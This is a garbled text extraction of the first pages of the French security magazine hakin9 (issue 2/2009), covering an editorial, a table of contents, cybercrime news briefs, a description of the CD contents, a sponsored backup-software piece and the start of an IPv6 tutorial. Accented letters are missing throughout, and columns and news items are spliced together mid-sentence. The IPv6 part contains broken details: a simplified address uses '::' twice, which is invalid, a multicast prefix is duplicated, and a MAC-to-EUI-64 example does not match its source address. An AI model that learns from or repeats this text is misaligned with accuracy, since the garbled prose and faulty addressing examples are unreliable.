Escolar Documentos
Profissional Documentos
Cultura Documentos
indd
2009-01-09, 12:41
02_rekl_elegia.indd
2009-01-08, 15:54
DITORIAL
CHERS LECTEURS,
ous tenez dans les mains le deuxime numro de hakin9 de cette anne. Quelles nouveauts allez vous retrouver dedans ? Comme toujours nous vous invitons plonger dans le monde de la scurit informatique en mettant sous la loupe entre autres des attaques sur les rseaux (attention vos firewalls !), les failles dans WiFi (qui n'est pas concern ? tout le monde prtend les connatre et pourtant le monde veut en savoir plus ...), les moyens de sauvegarder des donnes fragiles, la scurisation de codes sources pour les programmeurs, et d'autres informations utiles. Cela fait dj six mois que nous avons publi l'dition spciale consacre la technologie Cisco. Les rsultats ont largement dpass nos attentes, nous recevons encore des questions de votre part demandant comment retrouver cette dition. Nous sommes particulirement fiers de ce projet et nous vous remercions de votre intert pour ce guide. Pour tous ceux qui n'ont pas eu l'occasion de l'obtenir, nous avons deux bonnes nouvelles. Premirement, nous avons dcid de vous fournir dans chaque numro de hakin9 des matriaux traitant de cette thmatique, adapts spcialement pour tous ceux qui veulent apprendre et travailler quotidiennement sur les solutions Cisco. Dans ce numro nous vous invitons dcouvrir tous les dtails du protocole IPv6, le savoir indispensable pour chaque administrateur. Pensez vous l'avoir matris ? Consultez notre dossier, nous vous garantissons que vous y trouverez des astuces pratiques et surprenantes. Deuxime bonne nouvelle, nous sommes dj en train de prparer la nouvelle dition spciale hors srie de hakin9 starter kit ! Bah oui, et cette fois aussi il sera consacr aux rseaux informatiques en s'adressant principalement ceux qui cherchent des bases solides et exhaustives savoir. Regardez attentivement les magazines dans votre kiosque ... ou bien visitez rgulirement notre site pour tre au courant sur cette publication. Et tant qu'on y est, avez-vous dj visit notre forum ? Nous vous invitons rejoindre la communaut de nos membres. Profitez des expriences d'autres utilisateurs et faites nous savoir vos opinions sur hakin9 ! Nous les attendons avec impatience. Voila, il nous reste plus qu' vous inviter la lecture ...
1/2009 HAKIN9
03_wstepniak.indd
2009-01-09, 15:35
SOMMAIRE
DOSSIER
14 Le protocole IPv6
FRDRIC ROUDAUT Le nombre d'adresses attribues actuellement est proche des limites du protocole Ipv4. Pour cette raison le nouveau mode d'adressage est couramment mis en place . Il ne s'agit pas d'une simple extension d'IPv4, mais d'un protocole part entire, solution standardise pour tous les administrateurs rseux dans un futur trs proche. Cet article vous explique en dtails toutes les techniques fondamentales d'IPv6 du ct pratique.
36
IGNACE KAGNI KUEVIAKO Toute personne se retrouve mal l'aise si elle se sait espionne ou surveille par un individu malintentionn. Grce cet article vous allez suivre quelques possibilits d'interception et de lecture des paquets envoys sur le rseau. Ensuite vous apprendrez la mise en place d'un systme de cryptage efficace pour s'en protger.
TECHNIQUE
44 Nouvele faiblesse dans la technologie WiFi
LAURENT LEVIER Nous avons souvent parl des faiblesses les plus populaires de la technologie WiFi, y compris les failles du protocole WEP, mais est-ce qu'on est au courant de tout se qui se cache derrire le protocole WPA ? WPA est n suite aux carences dans la conception du protocole prcdent, mais comme vous le verrez, de nouvelles mthodes d'attaque sont dj prsents sous la main...
PRATIQUE
28 Tunneling HTTP une mthode simple pour contourner les firewalls
MICHAEL SCHRATT Tandis que les administrateurs font de leur mieux pour scuriser les attaques potentielles sur le rseau, il existe des utilisateurs qui tentent de compromettre le primtre de scurit. Michael Schratt vous montre comment utiliser les techniques de Canaux Cachs en cachant ses traces grce au Tunneling HTTP. Il est important de connatre les secrets des intrusions, mais faites attention de ne pas utiliser les techniques prsentes des fins illgales !
48
DAVIR MACIEJAK L'auteur continue de vous fournir des astuces permettant de comprendre les scripts malicieux. Comme ce vecteur d'attaques devient de plus en plus important, il y a de grands risques que vous soyez un jour face l'un d'eux. Suite la lecture de cette partie vous apprendrez identifier diffrentes types d'attaques, ainsi qu'analyser un shellcode.
HAKIN9
04_05_SPIS_TRESCI___FR.indd
2009-01-05, 18:00
SOMMAIRE
FOCUS
60 Approche de la virtualisation des postes de travail
GRGORY CARLET La virtualisation dispose de deux intrts majeurs: la facilit d'utilisation, ainsi que la concentration des postes de travail diffrents en un seul, ainsi que la mobilit. Mais cela ne se fait pas sans heurt et peut rapidement se faire au dtriment des performances et de la scurit des donnes transfres. L'auteur vous montre non seulement la mise en uvre d'une solution de virtualisation en pratique, mais aussi les enjeux de scurit que chacune des mthodes peut entraner.
66
HERV SCHAUER En France plus de 500 personnes ont une certification personnelle sur l'ISO 27001. Qu'est-ce qui les a men vers un tel investissement ? Herv Schauer vous explique les atouts du certificat pour un informaticien particulier, ensuite il vous prsente des conseils sur comment reussir sa certification et comment la mettre en valeur, une fois obtenue ...
DATA RECOVERY
70 Politique de gestion des donnes
DIDIER SICCHIA Cet article se propose d'examiner la mthode rflchie d'un grand groupe afin d'offrir aux entreprises une migration, un transfert ou une destruction de donnes efficace. Disposant de cette exprience supplmentaire, les particuliers auront ainsi plus de facilit percevoir les avantages et les inconvnients de certaines alternatives.
VARIA
06 En bref
Vous trouverez ici les nouvelles du monde de la scurit des systmes informatiques. Prpare par Christophe Ledorze Instructeur Linux Novell
10
Sur le CD-ROM
Nous vous prsentons le contenu et le mode de fonctionnement de la version rcente de notre principale distribution hakin9 avec le cours vido et les divers outils.
80 82
Interview
Nous vous invitons la lecture d'entretien avec Herv Schauer, l'expert du monde de la scurit informatique.
Quelques mots sur les articles qui paratront dans le numro 3/2009(37)
HAKIN9
04_05_SPIS_TRESCI___FR.indd
2009-01-09, 14:00
EN BREF
QUOTAOFF SUR /FORET_ AMAZONIENE
Dans la plupart des rgions du Brsil, toutes les entreprises lies l'industrie du bois provenant de la fort amazoniene sont soumises des quotas par zones pour contrler la dforestation galopante. Ces quotas tant fixs de manire informatique , il aura fallu peu de temps des esprits peu scrupuleux pour embaucher des pirates et bien plus aux autorits ainsi qu' Greenpeace pour comprendre l'tendue des dgts commis par ces mercenaires : 1,7 millions de mtres cubes, soit l'quivalent du volume de 780 piscines olympiques, vols la fort, tel est le chef d'accusation pesant sur 202 personnes selon Greenpeace. Celui-ci s'est d'ailleurs maladroitement chapp du laboratoire de ceux qui l'ont dcouvert , le groupe chinois Knownsec. La dernire des failles ,date du 11 dcembre, touche quant elle le serveur SQL de la marque , elle offre la possibilit aux habitus des SQL injection de jouer sur l'initialisation de variables par la procdure sp _ replwritetovarbin afin de pouvoir rcrire sur les zones mmoires en jeu. de logiciels sans le consentement des utilisateurs, la socit Cyberspy base en Floride a finalement vu son jugement modifi et peut depuis peu continuer de commercialiser ce logiciel jug douteux par beaucoup. La justice californienne a donc donn un aval conditionn cette recommercialisation. En effet la justice avait revu d'un bon oeil la possibilit de gestion parentale parentale et avait pris une position plus conciliante. Mais dornavant la socit devra clairement dire ses clients qu'ils ne peuvent prendre le contrle de postes sans en informer les utilisateurs et qu'elle devra revoir certains des fonctionnements de son Remotespy, comme le fait de ne fonctionner qu'en mode "cach" et qu'aucun menu, ou fentre n'en permet pas la dsinstallation.
SPAM PERDEZ 873 MILLIONS DE DOLLARS POUR TRE MINCE AVANT LES FTES
C'est la somme record statue par la cour amricaine, que devra verser la socit Atlantis Blue Capital aux dirigeants du social network le plus utilis, Facebook. En effet le verdict du procs qui a dbut au mois de mars a t prononc fin novembre. La socit en question, derrire laquelle se cache un canadien du nom de Adam Guerbuez, avait vol plusieurs comptes Facebook et les avait utiliss pour envoyer pas loin de 4 millions de mails aux couleurs du Viagra et de la marijuana la pyramide de contacts sur laquelle est fonde Facebook. Il y a fort a parier que les 628 millions d'euros que cela reprsente ne seront jamais verss, mais selon Max kelly, le responsable de la scurit du site communautaire, il s'agit l d'une grande victoire pour le site et ses usagers. Facebook s'attend-il recevoir rapidement les 873 millions de dollars et les partager d'une manire quelconque avec ses usagers ? Hlas, non. Il est invraisemblable que Guerbuez et Atlantis Blue Capital puissent un jour honorer le jugement rendu. Mais nous sommes confiants sur le fait que cette condamnation reprsente une forte
06_07_08_09_enBref.indd
2009-01-05, 18:01
EN BREF
dissuasion pour quiconque chercherai abuser Facebook et ses utilisateurs. Alexandre Gostev, Expert Anti-Virus Senior de Kaspersky Lab. Dbut 2008, nous prvoyions une hausse des cyber-criminels exploitant MySpace, Facebook et des sites du mme type et nous en avons la confirmation aujourd'hui. Je suis certain qu'il s'agit d'une premire tape et que les auteurs de virus vont continuer dans cette voie avec une intensit accrue. Une chose est sre la dcouverte de faille ou les virus d'un systme sont proportionnels sa popularit et nul n'ignore que Mac est de plus en plus reprsent, alors que faire, prvenir ou gurir ?
HEY ON T'A FILM EN TRAIN DE DANSER, REGARDE TA TTE T'ES TOUT ROUGE, IL FAUT QUE TU VOIS A !
Voil ce que vous pourriez recevoir de la part d'un ami infect par Koobface le ver communautaire svissant sur Facebook et Myspace. Koobface utilise la force du systme de messagerie communautaire pour infecter des utilisateurs et ainsi obtenir bon nombre de donnes confidentielles, professionnelles, bancaires etc. Il se propage simplement en envoyant des messages aux titres accrocheurs aux contacts des utilisateurs infects du type Paris Hilton lance un nain dans la rue, Regarde on t'a film nu !!! LOL.... Les messages laisss incluent des liens vers youtube.pl. Lorsque l'utilisateur clique sur ce lien, il est alors redirig vers http://youtube.ru, o l'attend un clip vido. Si l'utilisateur choisi alors de le regarder, un message apparait lui demandant d'installer la dernire version de Flash Player pour pouvoir regarder le clip. Mais lorsque celui-i clique sur le lien au lieu de tlcharger la dernire version de Flash Player, un fichier du nom de codesetup.exe est rapatri sur l'ordinateur de la victime et est alors prt logger les informations et forcer ses contacts le faire leur tour. Malheureusement, les utilisateurs font confiance aux messages laisss par des amis sur les sites de rseaux sociaux. Aussi la probabilit que l'utilisateur aille cliquer sur ces liens est trs forte, dduit
2/2009 HAKIN9
06_07_08_09_enBref.indd
2009-01-05, 18:01
EN BREF
UN PUR SANG RUSSE
Trois hommes ont ts inculps pour fraude aux tats unis, selon les accusations ils auraient utilis des chevaux de Troie faits maison afin de piller des banques en ligne et de dtourner des comptes de courtage. Alexander Bobnev, de Volgograd en Russie, aurait t le leader de cette escroquerie et il aurait collabor avec Aleksey Volynskiy, de Manhattan et Alexey Mineev de Hampton, New Hampshire, tous deux naturaliss amricains, qui aurait t les mains lgales de Bobnev sur le territoire amricain, ce sont eux qui craient les comptes et effectuaient les transferts sur lesquels un pourcentage tait transmis en Russie. L'arnaque a dur environ 15 mois, jusqu'au mois de dcembre 2007. Mais partir du mois de juin de l'anne dernire, la police a russi, l'aide d'un informateur placer sous contrle fdral les comptes incrimins et tracer des paiements de 15,400$ et 4,700$ depuis deux comptes compromis, ce qui fut suffisant pour stopper la fraude et recueillir les preuves suffisantes pour une arrestation. Chacun des hommes est poursuivi pour fraude, pour faux et usage de faux, avec circonstances aggravantes pour Volynskiy qui avait cr la fausse carte de crdit. ( paypal.com, bankofamerica.com, halifaxonline.co.uk, wachovia.com, chase.com...). Les identifiants ainsi que les mots de passes associs sont envoys une adresse base en Russie. les coupables. Provisoirement, les clients ne savent plus consulter leurs comptes par le biais d'internet. Ceux qui ont des virements urgents effectuer, sont pris de s'adresser l'agence du Crdit Agricole la plus proche, a dclar le CEO, Luc Versele.
06_07_08_09_enBref.indd
2009-01-05, 20:11
EN BREF
2/2009 HAKIN9
06_07_08_09_enBref.indd
2009-01-05, 18:01
HAKIN9.LIVE
CD-ROM HAKIN9.LIVE
Le magazine hakin9 est toujours accompagn d'un CD-ROM. Vous y trouverez en exclusivit un cours vido et un ensemble doutils particulirement utiles pour scuriser ses donnes.
omme toujours cette dition du magazine hakin9 est propose avec hakin9.live, CD bootable avec la distribution BackTrack3. BackTrack3 est la distribution Linux live la plus pertinente dans le registre de la scurit informatique. Sans aucune installation pralable, la plate-forme d'analyse peut tre directement dmarre partir du CD-Rom et son contenu entirement accessible en quelques minutes seulement. Outre les mises jour et d'autres optimisations, cette version de BackTrack3 hakin9.live contient galement des ditions spciales d'applications commerciales parmi les plus intressantes du moment. Elles sont prpares exclusivement l'attention toute particulire de nos lecteurs. Pour pouvoir utiliser BackTrack3 hakin9.live, il vous suffit de dmarrer votre ordinateur partir du CD. Pour pouvoir utiliser les applications commerciales fournies, inutile de dmarrer votre ordinateur partir du CD : vous les trouverez dans le dossier Applications. Chaque paquet, configuration de noyau et script contenu dans BackTrack3 est optimis de manire tre utilis par les experts en audits de scurit et de tests d'intrusion. Les patchs de correction et autres scripts automatiques ont t ajouts, appliqus ou dvelopps de manire proposer un environnement agrable, intuitif et prt l'emploi.
configuration ASP Web.Config, ralis par Assyad Hamza. Objectif du tutoriel est d'expliquer une mthode de scan utilise par les personnes malveillantes afin d'identifier les serveurs Web IIS ayant des failles de scurit, au niveau de la gestion des
droits d'accs, de lecture et d'criture. Il prsente diffrents moyens de collecter des informations sur un serveur: identifiants serveur mail, SQLServer, Mysql, et galement les accs administrateur.
COURS VIDO
Nous vous invitons consulter le cours vido : Vulnrabilits du fichier de
10 HAKIN9 2/2009
10_11_12_Opis_CD.indd
10
2009-01-05, 18:02
HAKIN9.LIVE
Sil vous est impossible de lire le CD. et que ce dernier nest pas endommag physiquement, essayez de lire dans au moins 2 lecteurs diffrents.
En cas de problme avec votre CD, envoyez-nous un message ladresse suivante : cd@hakin9.org
2/2009 HAKIN9
1 1
10_11_12_Opis_CD.indd
11
2009-01-05, 18:02
HAKIN9.LIVE
PASSWARE ENCRYPTION ANALYZER PROFESSIONAL
Ce programme permet de rechercher et rcuprer l'ensemble des mots de passe protgs ou crypts sur un ordinateur ou sur un rseau. Il arrive frquemment que des employs quittent l'entreprise sans donner le dtail prcis de leurs mots de passe et fichiers protgs. Encryption Analyzer Professional rsoud ce problme en un temps record une analyse de tout le systme prend moins d'une heure et les administrateurs obtiennent ensuite un rapport complet sur ces fichiers protgs. Encryption Analyzer Professional peut analyser des systmes au sein d'un rseau, effectuer des analyses planifies l'avance et supporter le mode batch. Passware Encryption Analyzer est galement disponible sous la forme d'un SDK http://www.lostpassword.com/ encryption-analyzer-sdk.htm pour la plateforme .NET, les dveloppeurs pourront ainsi exploiter l'ensemble des fonctionnalits d'Encryption Analyzer dans leurs applications sans crire une ligne de code. http://www.lostpassword.com/encryptionanalyzer.htm Prix : 295USD une dtection optimale tout en rduisant le risque de faux-positifs. Une protection en temps rel protge votre systme des menaces 24 heures sur 24 et le scan l'excution permet d'viter l'excution de programmes malicieux sur votre ordinateur. http://www.systweak.com/Products.asp Prix : 29,95USD
Le but de ce logiciel est de scuriser votre PC face aux menaces la vie prive et au tracking. Spyware Doctor est un utilitaire de premier ordre destin supprimer les malwares et les spywares. Il les supprime de votre PC et le protge des milliers de spywares, adwares, chevaux de Troie, enregistreurs de frappe, spybots et menaces de tracking. http://www.pctools.com/fr/consumer/ products/ Prix : 29,95EUR
MATRIAUX COMPLMENTAIRES
En supplment d'article Le protocole Ipv6 nous avons mis sur le CD les illustartions et captures d'cran qui vous aideront suivre le techniques dcrites dans l'article. Vous les trouverez dans le dossier articleIPv6. Bonne apprentissage !
10_11_12_Opis_CD.indd
12
2009-01-05, 18:02
ans cet article nous verrons en dtails les fonctionnalits et les avantages de Spb Backup 2.0. Vous prendrez connaissance non seulement des possibilits offertes par ce produit, mais galement ce qui le rend comptitif sur le march et ses principales caractristiques qui donnent de nouvelles possibilits aux utilisateurs grce un environnement accessible et bien pens.
Origine
Spb Backup 1.0 est sorti en 2006 et a connu un grand succs. lorigine, Spb Backup a fait son apparition grce a la technologie Spb Clone un produit, reconnu par des milliers dentreprises permettant de crer des copies exactes de son PDA. La simplicit de linterface utilisateur, la fiabilit et la facilit avec laquelle il restaure les donnes ont fait quen 2007 Spb Backup a figur parmi les meilleures ventes doutils de sauvegarde sur Pocket PC. Spb Backup est vite devenu un utilitaire de sauvegarde incontournable pour un grand nombre dODM, il tait livr avec des priphriques ASUS et Gigabyt. Aujourdhui, Spb lance sur le march Spb Backup 2.0, qui est la fois plus rapide, plus efficace et possdant une interface utilisateur amliore et innovante.
Philosophie du produit
Spb Backup entre dans la catgorie des logiciels de sauvegarde et de rcupration de donnes sur Windows Mobile. Il est galement utilis par les logiciels de migration qui sauvegardent lensemble des donnes (cela inclut tous les fichiers de configuration, programmes, mises a jour et bases de donnes) avant de les transfrer sur des priphriques jour de type matriel ou ROM. Spb Backup 2.0 a t conu avant tout pour tre accessible nimporte quel utilisateur Windows Mobile. Plus on avance et plus il y a une multitude de nouveaux appareils commercialiss. Cependant, certaines choses qui ne changeront jamais, par exemple les personnes qui perdent ou cassent leurs tlphones portables. Le but de Spb Backup 2.0 est de remdier aux problmes de transfert, perte de donnes, sauvegarde des prfrences et configurations entre tlphones Windows Mobile cest aussi simple que de dcompresser un fichier archiv. Spb Backup 2.0 marche la fois sur Pocket PC et Smartphone, il transfrera les archives sauvegardes vers un emplacement scuris sur PC via lassistant de synchronisation de Spb Backup. Spb Backup sauvegarde non seulement vos contacts, messages texte (sms), courriels et fichiers de sauvegarde, mais galement vos prfrences et les raccourcis. Il clone si bien les configurations dun tlphone Windows Mobile quil est difficile de se rendre compte quil y a eu une restauration, except lheure quil faut rgler soi-mme.
Voici divers cas envisageables : Le portable a t perdu ou vol. Malheureusement il y a encore beaucoup de personnes qui perdent ou se font voler leur portable. La simple perte dun tlphone portable peut entraner la perte de ses contacts ou de ses messages texte. Avec les tlphones Windows Mobile ce problme peut tre encore plus ardu. Les utilisateurs conservent non seulement des donnes tels que : leurs contacts, tches effectuer, rendez-vous, mais galement des infos GPS et des tonnes de logiciels. Dans ce cas meme des sauvegardes appropries sur carte mmoire ne sont daucune aide, en effet lorsque le portable est perdu, la carte mmoire lest galement. Spb Backup 2.0 comporte une nouvelle fonctionnalit qui permet de copier automatiquement les fichiers sauvegardes vers le bureau ce qui permet au moins de retrouver ses donnes selon les situations. Les donnes peuvent tre consultes et exportes grce un outil spcifique (dcompresser), ou restaures sur un autre portable. Le portable a eu des problems logiciels, vous avez du faire une rinitialisation. En 2005, Microsoft lana Windows Mobile 5. Le monde du tlphone portable avait plein despoir avec les solutions de stockage de type flash qui pouvait etre une solution aux pertes de donnes qui taient frquentes avec les premiers systmes dexploitation. La communaut du tlphone portable esprait que la sauvegarde des donnes ne soit plus indispensable. Microsoft supprima loption de sauvegarde dActiveSync sur les versions Windows Mobile 5 et suprieures. Toutefois, les rinitialisations (hard reset ) taient toujours la mode, les gens continuaient perdre leurs donnes et devaient faire rgulierment des sauvegardes. Spb Backup tait de loin lunique utilitaire de sauvegarde sur Windows Mobile 5. Autre aspect, certaines applications peuvent prsenter des dfauts ou bien sont incompatibles lorsquelles sont installes ensemble, cela rend lenvironnement de travail instable voire dfaillant. Ce problme est frquent depuis la version 1.0 de Spb Backup.
p u b l i c i t
Cas dutilisation
Pourquoi et quand un utilisateur doit sauvegarder les donnes de son portable? Quelles sont les possibilits de loutil de sauvegarde ?
13__sponsorowany_FR.indd
13
2009-01-05, 18:02
DOSSIER
FRDRIC ROUDAUT
Le protocole IPv6
Degr de difficult
Le nombre dadresses attribues actuellement est proche des limites du protocole IPv4 utilis pour la communication Internet. Comme le montrent diverses tudes : on assistera une pnurie dadresses lhorizon 2011. Le protocole IPv6 est la solution standardise pour palier ce manque dadresses.
epuis les annes 80, lInternet connat un succs incroyable. La majeure partie des entreprises y est maintenant directement connecte, le nombre de particuliers dtenteur dun abonnement Internet auprs dun FAI (Fournisseur dAccs Internet) est en constante croissance. La demande est telle que le nombre dadresses attribues actuellement est proche des limites du protocole IPv4 utilis pour la communication Internet. Les tudes ralises par les autorits responsables de lallocation dadresses ainsi que la commission europenne convergent : on assistera une pnurie dadresses lhorizon 2011. Il tait donc ncessaire dtendre le plan dadressage. Le protocole IPv6 est la solution standardise pour palier ce manque dadresses. La dfinition de ce nouveau protocole IPv6 a t galement une opportunit de corriger certains problmes inhrents au protocole IPv4. Ces problmes avaient t mis en exergue par la communaut Rseau au cours des dernires annes. De nouveaux besoins tels que la scurit, la mobilit, une facilitation des mcanismes de configuration sont galement apparus et ont pu tre pris en compte lors de la standardisation dIPv6. Ces diffrentes modifications font dIPv6 un protocole part entire et non une simple extension dIPv4. Il sagissait donc dadapter ces corrections sur lensemble des protocoles du modle en couche TCP/IP expliquant ainsi le travail relativement complexe et colossal effectu
par lorganisme de standardisation de lInternet, IETF (Internet Engineering Task Force) ces dix dernires annes principalement (mme si les spcifications initiales dIPv6 datent de 1988). dfaut d'espace, toutes les Figures parues dans l'article sont disponibles sur le CD joint au magazine (dossier : articleIPv6).
Lvolution la plus visible dIPv6 concerne lextension de son espace dadressage pour palier la pnurie dadresse du protocole actuel IPv4. Ce paragraphe vous expliquera le format de ces nouvelles adresses ainsi que le nouveau dcoupage en classes usit par IPv6.
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 14
2009-01-05, 18:03
Adressage Unicast
Les adresses Unicast sont destines la communication avec une interface unique. Ces adresses sont de deux types selon leur porte. Les adresses Lien-local : destines la communication au sein dun lien, Les adresses globales : ayant une porte mondiale et destines aux changes de lInternet IPv6.
La mthode de simplification 1 sur lexemple prcdent nous donne fe80:: 0240:96ff:fea7:00d3. En appliquant la mthode 2 on obtient ladresse fe80::240:96ff:fea7::d3, qui est beaucoup plus lisible. En IPv6 on abandonne le format classique de masque usit en IPv4 pour dcrire un rseau ou un sous-rseau par le nombre de bits pertinents aprs le symbole /. Exemple : 2a01:e35:2EC0:B6A0::/64 dcrit un rseau IPv6 compos des 64 premiers bits, FE80::/64 dcrit galement en format simplifi un rseau IPv6 de 64 bits. Il sagit en fait de FE80:0000::/64.
Similairement IPv4, on retrouve en plus une adresse de loopback ainsi quune adresse indtermine. La notion dadressage public/priv utilis en IPv4 est revisite en IPv6. Chaque interface possde une adresse Lien-local ainsi que potentiellement une ou plusieurs adresses globales. Ladresse utilise Tableau 1. Code Fabricant (OUI) sur 3 octets
Code Fabricant (OUI) sur 3 octets en hexadcimal 00 00 0C 00 03 93 02 80 8C 08 00 20 08 00 5A Tableau 2. Porte des adresses Multicast Valeur 1 2 4 5 0, 3, F 6, 7, A, B, C, D Porte Interface-local Lien-local Admin-local Site-local (actuellement dprci) Rserv Non assign
Gnralement, les 64 premiers bits de l'adresse IPv6 servent l'adresse de sous-rseau, tandis que les 64 bits suivants identifient l'hte l'intrieur du sous-rseau.
Tableau 3. Quelques Groupes Multicast prdfinis Prfixe FF01::1 FF02::1 FF01::1 FF02::2 FF02::9 Groupe Tous les nuds de linterface Tous les nuds du lien Tous les routeurs de linterface Tous les routeurs du lien Tous les routeurs RIPng
2/2009 HAKIN9 15
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 15
2009-01-05, 18:03
DOSSIER
La limitation majeure concerne la scurisation des changes de bout en bout. Un chiffrement ou une authentification utilisant ladresse de lmetteur devient ainsi invalide ds lors que ladresse de celui-ci est modifie par le routeur de bordure. Contrairement aux ides reues le NAT/PAT nest pas une scurit fiable et peut donc facilement tre abandonn au profit de mcanisme de scurisation de bout en bout. LE NAT/PAT est simplement un artifice pour palier la pnurie dadresses IPv4. interface sur un lien. Il est donc requis que ces identifiants dinterface soient uniques au sein dun prfixe rseau. Celles-ci sont formes depuis un identifiant EUI-64 (cf. Figure 1) par inversion dun bit particulier not u (universal/local bit). Les cartes Ethernet, elles, possdent un identifiant de la forme MAC-48 (cf. Figure 2) et sont exprimes sous la forme de 12 chiffres hexadcimaux : les 3 premiers octets nots OUI (Organizationally Unique Identifiers) sont administrs par lIEEE et identifient le constructeur, les 3 suivants sont la charge du constructeur et forment le numro de srie de la carte. :/64 lidentifiant dinterface au format EUI-64 modifi. La Figure 4 prsente un tel type dadresse.Lunicit au niveau lien de lidentifiant dinterface assure ainsi lunicit de ladresse IPv6 Lien-local. Ce type dadresse ne traverse jamais les routeurs.
Adresses Globales
Les adresses Globales sont formes de manire similaire aux adresses Lien-local par concatnation du prfixe rseau lidentifiant dinterface au format EUI-64 Modifi. Lunicit au niveau du prfixe de lidentifiant dinterface assurera galement lunicit mondiale de ladresse IPv6, les prfixes rseaux tant dlivrs par des fournisseurs de service ou directement des autorits de rgulation. La nomenclature dune telle adresse a t clairement dfinie afin de permettre des attributions hirarchiques de prfixes jusquaux sites finaux. Ce type dadresse est utilis pour une communication gnralement en dehors dun rseau local ou LAN (Local Area Network) voir lchelle de lInternet Ipv6. Ladresse de loopback (127.0.0.1 en IPv4) est utilise pour reprsenter le nud lui-mme. Elle ne transite jamais sur le rseau. Elle est note ::1. L'adresse indtemine est utilise par exemple lorsque linterface na pas encore connaissance de son adresse (0.0.0.0 en IPv4). Elle est note ::.
Identifiant EUI-64
Les adresses MAC (Media Access Control) sont des identifiants physiques stocks dans les cartes ou les interfaces rseaux afin de permettre un adressage mondial pratiquement unique. Cette assertion nest cependant pas garantie, la plupart des drivers permettent maintenant de la modifier manuellement. Les espaces de nommage suivants, grs par lIEEE (Institute of Electrical and Electronics Engineers) sont couramment utiliss afin dadresser ces diffrentes interfaces : EUI-64 sur 64 bits, MAC-48 sur 48 bits.
Le tableau 1 vous prsente ainsi quelques numros OUI attribus par lIANA. Chaque carte rseau vendue par Cisco commence donc par le prfixe 00-00-0C. Un identifiant EUI-64 modifi est form depuis cette adresse MAC par inversion du bit u (universal/local bit) et insertion de la valeur hexadcimale sur deux octets FFFE entre le numro constructeur et le numro dinterface (cf. Figure 3). Exemple : Ladresse Mac 00-40-96-A7C5-D3 donne ainsi lidentifiant dinterface 02-40-96-FF-FE-A7-C5-D3
Les adresses unicast IPv6 utilisent intensivement une version modifie de lEUI-64 (Extended Unique Identifier sur 64 bits) afin de permettre lidentification dune Tableau 4. Champs de lentte IPv6 Champs Version Traffic Class Flow Label Payload Length Taille 4 bits 8 bits 20 bits 16 bits Rle
Adresses Lien-local
Au niveau dun lien, les adresses IPv6 sont formes par concatnation du prfixe FE80:
Adressage Multicast
En IPv4, on dispose de la notion de broadcast afin de permettre la diffusion
Dcrit la version du protocole. Vaut 6 pour IPv6. Destin pour faire de la QoS par priorisation, shaping de trafic ayant pour but doffrir des fonctions de qualit de service comme Diffserv. Incompltement spcifi actuellement. Numro unique choisi par la source, ayant pour but doffrir des fonctions de qualit de service comme RSVP. Longueur en octet de la charge utile du paquet. En prsence dextension dentte, ceux-ci sont comptabiliss par ce champ. En IPv4, un champ similaire Total Length comptabilise en plus lentte ce qui finalement est inutile et limite la taille totale de la charge utile du paquet. Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Similaire au champ Protocol en IPv4. Dcrment par chaque routeur prsent le long du chemin. Le paquet est jet si ce champ devient nul permettant ainsi dviter que le paquet boucle indfiniment dans le rseau. Similaire au champ TTL en IPv4. Contient une adresse unicast de lmetteur du paquet. Contient ladresse du ou des destinataires du paquet.
8 bits 8 bits
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 16
2009-01-05, 18:03
Adressage Anycast
Une adresse anycast permet de reprsenter un service plutt quune interface donne. On veut ainsi pouvoir joindre une machine fournissant certains services sans se soucier de la machine contacte. Elle est trs peu utilise pour linstant et pose naturellement des problmes de scurit.
Tableau 6. Valeurs principales du champ Next Header pour les extensions dentte Protocoles Hop-by-Hop Options Header Fragment Header Destination Options Header Authentication Header Encapsulating Security Payload Valeur 0 44 60 51 50
DNSv6
On rappelle que le DNS (Domain Name System) permet lobtention dun nom plus lisible partir dune adresse et inversement partir du moment o ce nom a t enregistr dans une hirarchie de serveur DNS. Le format des adresses IPv6 tant naturellement plus long, la question dune mise jour du DNS tait vidente. En IPv4, la transformation nom DNS vers adresse IP est dfinie par un enregistrement nomm A . En IPv6, la taille des adresses tant 4 fois plus importante le quadrupl AAAA est utilis. La capture prsente en Figure 6 montre ainsi une requte DNSv6 sous Windows XP en utilisant la commande nslookup. On remarquera en particulier que le serveur DNS est adress en IPv4 bien que lon fasse une requte IPv6. Il en va de mme pour un serveur IPv6, celui-ci peut trs bien rpondre des requtes pour des adresses IPv4. Si lon avait ici effectu une requte pour obtenir toutes les adresses de www.kame.net, on aurait obtenu lensemble de ses adresses IPv4 et IPv6. La transformation inverse depuis ladresse vers le nom est similaire en IPv4 et IPv6 et utilise un enregistrement PTR (Seul larbre DNS inverse est diffrent : in.addr.arpa pour ipv4 et ip6.arpa pour IPv6). Il a prcdemment t indiqu quune adresse IPv6 tait forme par combinaison dun prfixe et dun identifiant dinterface
dpendant de son adresse de niveau liaison de donne. On comprend donc quun changement dinterface impacte potentiellement ladresse IPv6 de linterface et de l mme les enregistrements DNSv6. Ce souci a amen des rflexions sur la mise jour scurise de ces diffrents enregistrements au travers dun protocole baptis DNSsec (Domain Name System Security Extensions). Ce protocole ne scurise pas uniquement les changes mais protge galement les donnes ainsi que les enregistrements DNS de bout en bout par une hirarchie de cls. Chaque domaine signant son sous-domaine Malheureusement lheure actuelle ce protocole est trs peu usit. Seuls quelques domaines sont ainsi scuriss. Le RIPE-NCC (responsable du domaine in-addr.arpa) par exemple signe ainsi ses enregistrements avec DNSsec.
Entte IPv6
Lentte IPv6 a t soigneusement pens afin de supprimer les incohrences et problmes rencontrs en IPv4.
Tableau 7. Champ de lextension dentte Hop-By-Hop Option Header Champs Next Header Hdr Ext Len Options Taille 8 bits 8 bits Variable Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Longueur de lentte en mot de 8 bits sans prendre en compte les 8 premiers bits. Contient une ou plusieurs sous-options adquates au protocole usit. La taille de ce champ est telle que lextension dentte soit un multiple de 8 octets.
2/2009 HAKIN9 17
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 17
2009-01-05, 18:03
DOSSIER
